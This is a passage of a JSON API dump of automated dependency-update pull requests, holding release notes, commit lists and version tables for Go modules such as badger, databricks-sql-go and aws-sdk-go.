href=\"https://github.com/databricks/databricks-sql-go/commit/3f115aabd2b3f239c6d0f6eaa2d66a5e8e61791d\"\u003e\u003ccode\u003e3f115aa\u003c/code\u003e\u003c/a\u003e Add enforceEmbeddedSchemaCorrectness to TExecuteStatementReq (\u003ca href=\"https://redirect.github.com/databricks/databricks-sql-go/issues/344\"\u003e#344\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/databricks/databricks-sql-go/commit/f0487d13339c85f1669ebe26c6eac78ce306e713\"\u003e\u003ccode\u003ef0487d1\u003c/code\u003e\u003c/a\u003e Enable telemetry by default with DSN-controlled priority and full event corre...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/databricks/databricks-sql-go/commit/4faa786f87c87f1941a3ef2b9c3edecdf125e8f5\"\u003e\u003ccode\u003e4faa786\u003c/code\u003e\u003c/a\u003e Bump actions/checkout from 4.3.1 to 6.0.2 (\u003ca href=\"https://redirect.github.com/databricks/databricks-sql-go/issues/333\"\u003e#333\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/databricks/databricks-sql-go/commit/73b3f3fc6c8873850db030a71f12a4f932b1ad41\"\u003e\u003ccode\u003e73b3f3f\u003c/code\u003e\u003c/a\u003e Bump actions/cache from 4.3.0 to 5.0.4 (\u003ca href=\"https://redirect.github.com/databricks/databricks-sql-go/issues/335\"\u003e#335\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/databricks/databricks-sql-go/commit/ea861a01da7719d3e170990d69fc399468101d27\"\u003e\u003ccode\u003eea861a0\u003c/code\u003e\u003c/a\u003e Bump actions/setup-go from 5.6.0 to 6.4.0 (\u003ca href=\"https://redirect.github.com/databricks/databricks-sql-go/issues/342\"\u003e#342\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/databricks/databricks-sql-go/commit/dbce21ae387b552247507646b0d2a4ca26281b6b\"\u003e\u003ccode\u003edbce21a\u003c/code\u003e\u003c/a\u003e Move CI to Databricks protected runners with JFrog OIDC (\u003ca href=\"https://redirect.github.com/databricks/databricks-sql-go/issues/348\"\u003e#348\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/databricks/databricks-sql-go/compare/v1.7.0...v1.11.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/dgraph-io/badger/v4` from 4.7.0 to 4.9.1\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/dgraph-io/badger/releases\"\u003egithub.com/dgraph-io/badger/v4's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev4.9.1\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003efix(aix): add aix directory synchronization support by \u003ca href=\"https://github.com/pmur\"\u003e\u003ccode\u003e@​pmur\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/dgraph-io/badger/pull/2115\"\u003edgraph-io/badger#2115\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efix: correct the comment on value size in skl.node by \u003ca href=\"https://github.com/ahrtr\"\u003e\u003ccode\u003e@​ahrtr\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/dgraph-io/badger/pull/2250\"\u003edgraph-io/badger#2250\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003echore: Update changelog by \u003ca href=\"https://github.com/matthewmcneely\"\u003e\u003ccode\u003e@​matthewmcneely\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/dgraph-io/badger/pull/2256\"\u003edgraph-io/badger#2256\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003echore(ci): update arm runner label by \u003ca href=\"https://github.com/matthewmcneely\"\u003e\u003ccode\u003e@​matthewmcneely\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/dgraph-io/badger/pull/2248\"\u003edgraph-io/badger#2248\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003etest: add checksum tests for package y by \u003ca href=\"https://github.com/miladev95\"\u003e\u003ccode\u003e@​miladev95\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/dgraph-io/badger/pull/2246\"\u003edgraph-io/badger#2246\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eNew Contributors\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ahrtr\"\u003e\u003ccode\u003e@​ahrtr\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/dgraph-io/badger/pull/2250\"\u003edgraph-io/badger#2250\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/miladev95\"\u003e\u003ccode\u003e@​miladev95\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/dgraph-io/badger/pull/2246\"\u003edgraph-io/badger#2246\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pmur\"\u003e\u003ccode\u003e@​pmur\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/dgraph-io/badger/pull/2115\"\u003edgraph-io/badger#2115\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/dgraph-io/badger/compare/v4.9.0...v4.9.1\"\u003ehttps://github.com/dgraph-io/badger/compare/v4.9.0...v4.9.1\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev4.9.0\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003efix(docs): fix typos by \u003ca href=\"https://github.com/kianmeng\"\u003e\u003ccode\u003e@​kianmeng\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/dgraph-io/badger/pull/2227\"\u003edgraph-io/badger#2227\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efix(y): shall always return empty slice rather than nil by \u003ca href=\"https://github.com/kooltuoehias\"\u003e\u003ccode\u003e@​kooltuoehias\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/dgraph-io/badger/pull/2245\"\u003edgraph-io/badger#2245\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efix: test.sh error by \u003ca href=\"https://github.com/kianmeng\"\u003e\u003ccode\u003e@​kianmeng\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/dgraph-io/badger/pull/2225\"\u003edgraph-io/badger#2225\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efix: typo of abandoned by \u003ca href=\"https://github.com/jas4711\"\u003e\u003ccode\u003e@​jas4711\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/dgraph-io/badger/pull/2222\"\u003edgraph-io/badger#2222\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003echore(deps): Update go minor and patch by \u003ca href=\"https://github.com/renovate\"\u003e\u003ccode\u003e@​renovate\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/dgraph-io/badger/pull/2212\"\u003edgraph-io/badger#2212\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003echore(deps): Update dependency node to v22 by \u003ca href=\"https://github.com/renovate\"\u003e\u003ccode\u003e@​renovate\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/dgraph-io/badger/pull/2219\"\u003edgraph-io/badger#2219\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003echore: update the trunk conf file by \u003ca href=\"https://github.com/matthewmcneely\"\u003e\u003ccode\u003e@​matthewmcneely\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/dgraph-io/badger/pull/2217\"\u003edgraph-io/badger#2217\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003echore(deps): Update go minor and patch by \u003ca href=\"https://github.com/renovate\"\u003e\u003ccode\u003e@​renovate\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/dgraph-io/badger/pull/2218\"\u003edgraph-io/badger#2218\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003echore(deps): Update actions/checkout action to v5 by \u003ca href=\"https://github.com/renovate\"\u003e\u003ccode\u003e@​renovate\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/dgraph-io/badger/pull/2221\"\u003edgraph-io/badger#2221\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003echore(deps): Update actions (major) by \u003ca href=\"https://github.com/renovate\"\u003e\u003ccode\u003e@​renovate\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/dgraph-io/badger/pull/2229\"\u003edgraph-io/badger#2229\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003emove docs pages in the repo by \u003ca href=\"https://github.com/raphael-istari\"\u003e\u003ccode\u003e@​raphael-istari\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/dgraph-io/badger/pull/2232\"\u003edgraph-io/badger#2232\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003echore: configure renovate to leave go version as declared by \u003ca href=\"https://github.com/matthewmcneely\"\u003e\u003ccode\u003e@​matthewmcneely\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/dgraph-io/badger/pull/2235\"\u003edgraph-io/badger#2235\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003echore: change renovate to maintain backwards compatible go version by \u003ca href=\"https://github.com/matthewmcneely\"\u003e\u003ccode\u003e@​matthewmcneely\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/dgraph-io/badger/pull/2236\"\u003edgraph-io/badger#2236\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003echore: update README.md with correct links and badges by \u003ca href=\"https://github.com/matthewmcneely\"\u003e\u003ccode\u003e@​matthewmcneely\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/dgraph-io/badger/pull/2239\"\u003edgraph-io/badger#2239\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003echore: add doc for encryption at rest by \u003ca href=\"https://github.com/raphael-istari\"\u003e\u003ccode\u003e@​raphael-istari\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/dgraph-io/badger/pull/2240\"\u003edgraph-io/badger#2240\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003echore(ci): restrict Dgraph test to core packages only by \u003ca href=\"https://github.com/matthewmcneely\"\u003e\u003ccode\u003e@​matthewmcneely\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/dgraph-io/badger/pull/2242\"\u003edgraph-io/badger#2242\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003echore: prepare for v4.9.0 release by \u003ca href=\"https://github.com/matthewmcneely\"\u003e\u003ccode\u003e@​matthewmcneely\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/dgraph-io/badger/pull/2247\"\u003edgraph-io/badger#2247\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eNew Contributors\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/matthewmcneely\"\u003e\u003ccode\u003e@​matthewmcneely\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/dgraph-io/badger/pull/2217\"\u003edgraph-io/badger#2217\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jas4711\"\u003e\u003ccode\u003e@​jas4711\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/dgraph-io/badger/pull/2222\"\u003edgraph-io/badger#2222\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/raphael-istari\"\u003e\u003ccode\u003e@​raphael-istari\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/dgraph-io/badger/pull/2232\"\u003edgraph-io/badger#2232\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/kianmeng\"\u003e\u003ccode\u003e@​kianmeng\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/dgraph-io/badger/pull/2225\"\u003edgraph-io/badger#2225\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/kooltuoehias\"\u003e\u003ccode\u003e@​kooltuoehias\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/dgraph-io/badger/pull/2245\"\u003edgraph-io/badger#2245\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/dgraph-io/badger/compare/v4.8.0...v4.9.0\"\u003ehttps://github.com/dgraph-io/badger/compare/v4.8.0...v4.9.0\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003eBadger v4.8.0\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003echore(deps): Update go minor and patch by \u003ca href=\"https://github.com/renovate\"\u003e\u003ccode\u003e@​renovate\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/hypermodeinc/badger/pull/2189\"\u003ehypermodeinc/badger#2189\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eenh: Compile with jemalloc v5.3.0 by \u003ca href=\"https://github.com/solracsf\"\u003e\u003ccode\u003e@​solracsf\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/hypermodeinc/badger/pull/2191\"\u003ehypermodeinc/badger#2191\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003echore(deps): Update module golang.org/x/sys to v0.33.0 by \u003ca href=\"https://github.com/renovate\"\u003e\u003ccode\u003e@​renovate\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/hypermodeinc/badger/pull/2195\"\u003ehypermodeinc/badger#2195\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003edocs: add new badge by \u003ca href=\"https://github.com/enlightened88\"\u003e\u003ccode\u003e@​enlightened88\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/hypermodeinc/badger/pull/2194\"\u003ehypermodeinc/badger#2194\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/dgraph-io/badger/blob/main/CHANGELOG.md\"\u003egithub.com/dgraph-io/badger/v4's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e[4.9.1] - 2026-02-04\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eFixed\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003efix(aix): add aix directory synchro...\n\n_Description has been truncated_","html_url":"https://github.com/michael-angelo-guban/go-ruder-server/pull/80","url":"https://dependabot.ecosyste.ms/api/v1/hosts/GitHub/repositories/michael-angelo-guban%2Fgo-ruder-server/issues/80","packages_url":"https://dependabot.ecosyste.ms/api/v1/issues/80/packages"},{"uuid":"4474365832","node_id":"PR_kwDOFyRkIM7c6gYr","number":10771,"state":"open","title":"Bump the all-go-mod-patch-and-minor group across 2 directories with 43 updates","user":"dependabot[bot]","labels":["ok-to-test","size/XXL","dependabot"],"assignees":[],"locked":false,"comments_count":3,"pull_request":true,"closed_at":null,"author_association":null,"state_reason":null,"created_at":"2026-05-19T04:22:30.000Z","updated_at":"2026-05-19T04:27:13.000Z","time_to_close":null,"merged_at":null,"merged_by":null,"closed_by":null,"dependency_metadata":{"prefix":"Bump","group_name":"all-go-mod-patch-and-minor","update_count":43,"packages":[{"name":"github.com/aws/aws-sdk-go","old_version":"1.50.36","new_version":"1.55.8","repository_url":"https://github.com/aws/aws-sdk-go"},{"name":"github.com/aws/aws-sdk-go-v2","old_version":"1.30.1","new_version":"1.41.7","repository_url":"https://github.com/aws/aws-sdk-go-v2"},{"name":"github.com/aws/aws-sdk-go-v2/config","old_version":"1.26.6","new_version":"1.32.17","repository_url":"https://github.com/aws/aws-sdk-go-v2"},{"name":"github.com/aws/aws-sdk-go-v2/service/ec2","old_version":"1.167.1","new_version":"1.303.0","repository_url":"https://github.com/aws/aws-sdk-go-v2"},{"name":"github.com/aws/aws-sdk-go-v2/service/ecr","old_version":"1.27.4","new_version":"1.57.2","repository_url":"https://github.com/aws/aws-sdk-go-v2"},{"name":"github.com/aws/eks-anywhere-packages","old_version":"0.4.5","new_version":"0.4.15","repository_url":"https://github.com/aws/eks-anywhere-packages"},{"name":"github.com/aws/etcdadm-bootstrap-provider","old_version":"1.0.17","new_version":"1.0.19","repository_url":"https://github.com/aws/etcdadm-bootstrap-provider"},{"name":"github.com/aws/etcdadm-controller","old_version":"1.0.25","new_version":"1.0.27","repository_url":"https://github.com/aws/etcdadm-controller"},{"name":"github.com/bmc-toolbox/bmclib/v2","old_version":"2.1.1-0.20231206130132-1063371b9ed6","new_version":"2.3.5","repository_url":"https://github.com/bmc-toolbox/bmclib"},{"name":"github.com/docker/cli","old_version":"29.2.0+incompatible","new_version":"29.5.1+incompatible","repository_url":"https://github.com/docker/cli"},{"name":"github.com/go-git/go-git/v5","old_version":"5.17.1","new_version":"5.19.1","repository_url":"https://github.com/go-git/go-git"},{"name":"github.com/go-jose/go-jose/v3","old_version":"3.0.4","new_version":"3.0.5","repository_url":"https://github.com/go-jose/go-jose"},{"name":"github.com/nutanix-cloud-native/prism-go-client","old_version":"0.3.4","new_version":"0.7.2","repository_url":"https://github.com/nutanix-cloud-native/prism-go-client"},{"name":"github.com/onsi/gomega","old_version":"1.38.2","new_version":"1.41.0","repository_url":"https://github.com/onsi/gomega"},{"name":"github.com/spf13/cobra","old_version":"1.10.1","new_version":"1.10.2","repository_url":"https://github.com/spf13/cobra"},{"name":"github.com/vmware/govmomi","old_version":"0.51.0","new_version":"0.54.0","repository_url":"https://github.com/vmware/govmomi"},{"name":"go.uber.org/zap","old_version":"1.27.1","new_version":"1.28.0","repository_url":"https://github.com/uber-go/zap"},{"name":"golang.org/x/oauth2","old_version":"0.33.0","new_version":"0.36.0","repository_url":"https://github.com/golang/oauth2"},{"name":"gopkg.in/ini.v1","old_version":"1.67.0","new_version":"1.67.2"},{"name":"helm.sh/helm/v3","old_version":"3.18.5","new_version":"3.21.0","repository_url":"https://github.com/helm/helm"},{"name":"sigs.k8s.io/cluster-api/test","old_version":"1.11.1","new_version":"1.11.11","repository_url":"https://github.com/kubernetes-sigs/cluster-api"},{"name":"sigs.k8s.io/controller-runtime","old_version":"0.22.4","new_version":"0.22.5","repository_url":"https://github.com/kubernetes-sigs/controller-runtime"},{"name":"github.com/itchyny/gojq","old_version":"0.12.17","new_version":"0.12.19","repository_url":"https://github.com/itchyny/gojq"},{"name":"k8s.io/kubelet","old_version":"0.29.5","new_version":"0.29.15","repository_url":"https://github.com/kubernetes/kubelet"}],"path":null,"ecosystem":"go"},"body":"Bumps the all-go-mod-patch-and-minor group with 24 updates in the / directory:\n\n| Package | From | To |\n| --- | --- | --- |\n| [github.com/aws/aws-sdk-go](https://github.com/aws/aws-sdk-go) | `1.50.36` | `1.55.8` |\n| [github.com/aws/aws-sdk-go-v2](https://github.com/aws/aws-sdk-go-v2) | `1.30.1` | `1.41.7` |\n| [github.com/aws/aws-sdk-go-v2/config](https://github.com/aws/aws-sdk-go-v2) | `1.26.6` | `1.32.17` |\n| [github.com/aws/aws-sdk-go-v2/service/ec2](https://github.com/aws/aws-sdk-go-v2) | `1.167.1` | `1.303.0` |\n| [github.com/aws/aws-sdk-go-v2/service/ecr](https://github.com/aws/aws-sdk-go-v2) | `1.27.4` | `1.57.2` |\n| [github.com/aws/eks-anywhere-packages](https://github.com/aws/eks-anywhere-packages) | `0.4.5` | `0.4.15` |\n| [github.com/aws/etcdadm-bootstrap-provider](https://github.com/aws/etcdadm-bootstrap-provider) | `1.0.17` | `1.0.19` |\n| [github.com/aws/etcdadm-controller](https://github.com/aws/etcdadm-controller) | `1.0.25` | `1.0.27` |\n| [github.com/bmc-toolbox/bmclib/v2](https://github.com/bmc-toolbox/bmclib) | `2.1.1-0.20231206130132-1063371b9ed6` | `2.3.5` |\n| [github.com/docker/cli](https://github.com/docker/cli) | `29.2.0+incompatible` | `29.5.1+incompatible` |\n| [github.com/go-git/go-git/v5](https://github.com/go-git/go-git) | `5.17.1` | `5.19.1` |\n| [github.com/go-jose/go-jose/v3](https://github.com/go-jose/go-jose) | `3.0.4` | `3.0.5` |\n| [github.com/nutanix-cloud-native/prism-go-client](https://github.com/nutanix-cloud-native/prism-go-client) | `0.3.4` | `0.7.2` |\n| [github.com/onsi/gomega](https://github.com/onsi/gomega) | `1.38.2` | `1.41.0` |\n| [github.com/spf13/cobra](https://github.com/spf13/cobra) | `1.10.1` | `1.10.2` |\n| [github.com/vmware/govmomi](https://github.com/vmware/govmomi) | `0.51.0` | `0.54.0` |\n| [go.uber.org/zap](https://github.com/uber-go/zap) | `1.27.1` | `1.28.0` |\n| [golang.org/x/oauth2](https://github.com/golang/oauth2) | `0.33.0` | `0.36.0` |\n| gopkg.in/ini.v1 | `1.67.0` | `1.67.2` |\n| [helm.sh/helm/v3](https://github.com/helm/helm) | `3.18.5` | `3.21.0` |\n| [sigs.k8s.io/cluster-api/test](https://github.com/kubernetes-sigs/cluster-api) | `1.11.1` | `1.11.11` |\n| [sigs.k8s.io/controller-runtime](https://github.com/kubernetes-sigs/controller-runtime) | `0.22.4` | `0.22.5` |\n| [github.com/itchyny/gojq](https://github.com/itchyny/gojq) | `0.12.17` | `0.12.19` |\n| [k8s.io/kubelet](https://github.com/kubernetes/kubelet) | `0.29.5` | `0.29.15` |\n\nBumps the all-go-mod-patch-and-minor group with 11 updates in the /release/cli directory:\n\n| Package | From | To |\n| --- | --- | --- |\n| [github.com/aws/aws-sdk-go](https://github.com/aws/aws-sdk-go) | `1.54.12` | `1.55.8` |\n| [github.com/aws/aws-sdk-go-v2](https://github.com/aws/aws-sdk-go-v2) | `1.32.7` | `1.41.7` |\n| [github.com/aws/aws-sdk-go-v2/config](https://github.com/aws/aws-sdk-go-v2) | `1.26.6` | `1.32.17` |\n| [github.com/onsi/gomega](https://github.com/onsi/gomega) | `1.38.2` | `1.41.0` |\n| [github.com/spf13/cobra](https://github.com/spf13/cobra) | `1.10.1` | `1.10.2` |\n| [golang.org/x/oauth2](https://github.com/golang/oauth2) | `0.33.0` | `0.36.0` |\n| [helm.sh/helm/v3](https://github.com/helm/helm) | `3.18.5` | `3.21.0` |\n| [sigs.k8s.io/controller-runtime](https://github.com/kubernetes-sigs/controller-runtime) | `0.22.4` | `0.22.5` |\n| [github.com/itchyny/gojq](https://github.com/itchyny/gojq) | `0.12.17` | `0.12.19` |\n| [github.com/aws/aws-sdk-go-v2/service/kms](https://github.com/aws/aws-sdk-go-v2) | `1.37.9` | `1.51.1` |\n| [github.com/fsouza/go-dockerclient](https://github.com/fsouza/go-dockerclient) | `1.12.2-0.20250814055408-c31f6141d29b` | `1.13.1` |\n\n\nUpdates `github.com/aws/aws-sdk-go` from 1.50.36 to 1.55.8\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/aws/aws-sdk-go/releases\"\u003egithub.com/aws/aws-sdk-go's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch1\u003eRelease v1.55.8 (2025-07-31)\u003c/h1\u003e\n\u003ch3\u003eSDK Features\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eMark the module and all packages as deprecated.\n\u003cul\u003e\n\u003cli\u003eThis SDK has entered end-of-support.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003eRelease v1.55.7 (2025-04-22)\u003c/h1\u003e\n\u003ch3\u003eSDK Bugs\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003eservice/s3/s3manager\u003c/code\u003e: Abort multipart download if object is modified during download\n\u003cul\u003e\n\u003cli\u003eFixes \u003ca href=\"https://redirect.github.com/aws/aws-sdk-go/issues/4986\"\u003e4986\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003eRelease v1.55.6 (2025-01-15)\u003c/h1\u003e\n\u003ch3\u003eSDK Bugs\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eFix broken printf for go1.24\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003eRelease v1.55.5 (2024-07-30)\u003c/h1\u003e\n\u003ch3\u003eService Client Updates\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003eservice/appstream\u003c/code\u003e: Updates service API and documentation\n\u003cul\u003e\n\u003cli\u003eAdded support for Red Hat Enterprise Linux 8 on Amazon AppStream 2.0\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eservice/autoscaling\u003c/code\u003e: Updates service API and documentation\n\u003cul\u003e\n\u003cli\u003eIncrease the length limit for VPCZoneIdentifier from 2047 to 5000\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eservice/codepipeline\u003c/code\u003e: Updates service API, documentation, and paginators\n\u003cul\u003e\n\u003cli\u003eAWS CodePipeline V2 type pipelines now support stage level conditions to enable development teams to safely release changes that meet quality and compliance requirements.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eservice/elasticache\u003c/code\u003e: Updates service documentation\n\u003cul\u003e\n\u003cli\u003eDoc only update for changes to deletion API.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eservice/elasticloadbalancing\u003c/code\u003e: Updates service API\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eservice/eventbridge\u003c/code\u003e: Updates service API\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eservice/logs\u003c/code\u003e: Updates service API\n\u003cul\u003e\n\u003cli\u003eAdd v2 smoke tests and smithy smokeTests trait for SDK testing.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eservice/models.lex.v2\u003c/code\u003e: Updates service API and documentation\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eservice/rolesanywhere\u003c/code\u003e: Updates service API and documentation\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eservice/tnb\u003c/code\u003e: Updates service API and documentation\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eservice/workspaces\u003c/code\u003e: Updates service documentation\n\u003cul\u003e\n\u003cli\u003eRemoving multi-session as it isn't supported for pools\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003eRelease v1.55.4 (2024-07-29)\u003c/h1\u003e\n\u003ch3\u003eService Client Updates\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003eservice/elasticache\u003c/code\u003e: Updates service documentation\n\u003cul\u003e\n\u003cli\u003eRenaming full service name as it appears in developer documentation.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eservice/memorydb\u003c/code\u003e: Updates service API and documentation\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/070853e88d22854d2355c2543d0958a5f76ad407\"\u003e\u003ccode\u003e070853e\u003c/code\u003e\u003c/a\u003e release v1.55.8 (2025-07-31)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/bb0168ecfa52f8809b27912ded94edafaa019512\"\u003e\u003ccode\u003ebb0168e\u003c/code\u003e\u003c/a\u003e Add deprecation warnings everywhere and remove some README content\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/7ce44f3b563e6c00488bc9c81fb12ef232d72d93\"\u003e\u003ccode\u003e7ce44f3\u003c/code\u003e\u003c/a\u003e aws\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/6d9a26d85968c06f7e83b3233c5454b93c1ccfd8\"\u003e\u003ccode\u003e6d9a26d\u003c/code\u003e\u003c/a\u003e remove doc issue tmpl\u003c/li\u003e\n\u003cli\u003e\u003ca 